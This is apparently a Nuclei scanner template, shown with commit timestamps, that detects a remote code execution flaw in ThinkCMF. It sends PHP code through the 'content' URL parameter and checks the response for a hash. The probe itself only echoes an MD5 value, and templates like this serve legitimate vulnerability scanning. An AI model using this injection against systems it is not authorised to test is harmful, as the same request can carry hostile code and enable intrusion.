2021-03-24 01:10:20 +00:00
id : thinkcmf-arbitrary-code-execution
info :
2022-10-10 19:22:59 +00:00
name : ThinkCMF - Remote Code Execution
2021-03-24 01:10:20 +00:00
author : pikpikcu
severity : high
2022-10-10 19:22:59 +00:00
description : ThinkCMF is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2022-04-22 10:38:41 +00:00
reference :
- https://www.shuzhiduo.com/A/l1dygr36Je/
2022-09-01 20:08:27 +00:00
tags : thinkcmf,rce
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-03-24 01:10:20 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-24 01:10:20 +00:00
- method : GET
path :
2022-09-01 20:08:27 +00:00
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF');"
2021-03-24 01:10:20 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-09-01 20:08:27 +00:00
- "d9b2c63a497e2f30c4ad9ad083a00691"
2021-03-24 01:10:20 +00:00
- type : status
status :
- 200